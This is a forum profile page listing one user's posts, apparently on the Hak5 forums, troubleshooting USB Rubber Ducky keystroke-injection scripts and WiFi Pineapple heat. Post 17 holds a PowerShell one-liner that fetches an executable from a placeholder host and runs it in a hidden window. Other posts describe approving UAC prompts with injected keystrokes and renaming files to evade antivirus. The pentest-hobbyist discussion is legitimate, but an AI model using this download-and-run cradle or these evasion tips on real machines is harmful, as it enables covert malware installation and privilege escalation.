Jump to content

White Light

Active Members
  • Posts

    67
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by White Light

  1. They moved from google code over to github like...2 years ago? https://github.com/hak5darren/USB-Rubber-Ducky/
  2. This was a pretty hot topic a while back (pardon the pun). Seems that the general consensus was that it's normal and completely OK for it to be quite warm, and that passive cooling already in place should be more than sufficient to keep it at safe temperatures.
  3. No. The ducky starts to run as soon as it's plugged in, the only problem is that the computer won't respond to the keystrokes until after the driver has loaded. You will need a delay otherwise it'll start part way through. I'm not sure that the destination will function correctly. Variables in powershell are like $this and I don't think the web request will download the file to the correct location. You'll have to use $env:appdata instead.
  4. 1. Don't change the format of the SD card. It should come standard as FAT32 (I believe) so leave it as that. 2. There's no way to force powershell to stay active, as you've set the windowstyle to hidden. 3. No idea about any special drivers. 4. Stay with GUI r as you are already using. 5. I use the encoder from the rubber ducky github. 6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. 7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. 8. No, it won't need Java when it is running as a keyboard.
  5. That all depends on the restrictions in place. What is important to think of is this: anything YOU can do with a keyboard, the ducky can do as well. If you can't open up the command prompt, neither can the ducky. If the registry editor is blocked for you, so it is for the ducky.
  6. Powershell is a more powerful shell (hence the name) so you can basically do everything in it as in CMD, though sometimes requiring a different way.
  7. Is powershell disabled by the policy as well? Some people overlook that.
  8. Thank you for including your answer after you found your solution. Now anyone with the same issue will see your post and know how to solve it themselves. It always bothers me when people just say "Nevermind, I fixed it" without explaining their solution.
  9. You're complaining after <1 hour from your original post? Few people have patience If you actually looked at the info that was given with your ducky, you'd see you could go to USBRubberDucky.com, and from there find this page to download what you want. But hey, if you're a "computer idiot" and "will not use" the ducky, I'll take it off your hands.
  10. I think there might be a minimum number of posts required to edit your own posts (kinda weird, right?). The link to edit your post should be right underneath the post itself, next to the Multiquote button, though it's grayed out when you're not hovering over it.
  11. Well ASCII_9 is a literal tab, so the issue is probably the tab you clearly have there instead of a space. In addition, you're going to run into issues with line 13. Try running echo C:\%userprofile%\Desktop\ in cmd.exe and see what the output is.
  12. The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.
  13. I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt. That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.
  14. I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.
  15. I asked this question a bit earlier and got this response:
  16. Definitely an interesting idea. It would make it a lot easier for new users to find code to do what they want, though I still think it's best that they learn how to do it themselves.
  17. You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle. (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'
  18. Why download and use the VB script to download the end file when you can just download and execute the file directly?
  19. The pineapple runs very warm, this is normal. I can't remember the exact figures, but even when it's "hot", Darren assured me that it's still well within its operating temperature range and safe to use without active cooling.
  20. You basically just copied the tutorial that is stickied at the top of the forum.
  21. What you need to do is flash the firmware with composite duck then you will have both storage and HID features.
  22. If it's executing the old script, that means you either didn't copy over the inject.bin file properly, or you didn't create the inject.bin file properly (meaning you created it using the old script, or you accidentally created it in a different location without realizing). If it simply wasn't executing, or started seemingly part-way through, that would mean you need a bigger delay (2000-5000 milliseconds is good).
×
×
  • Create New...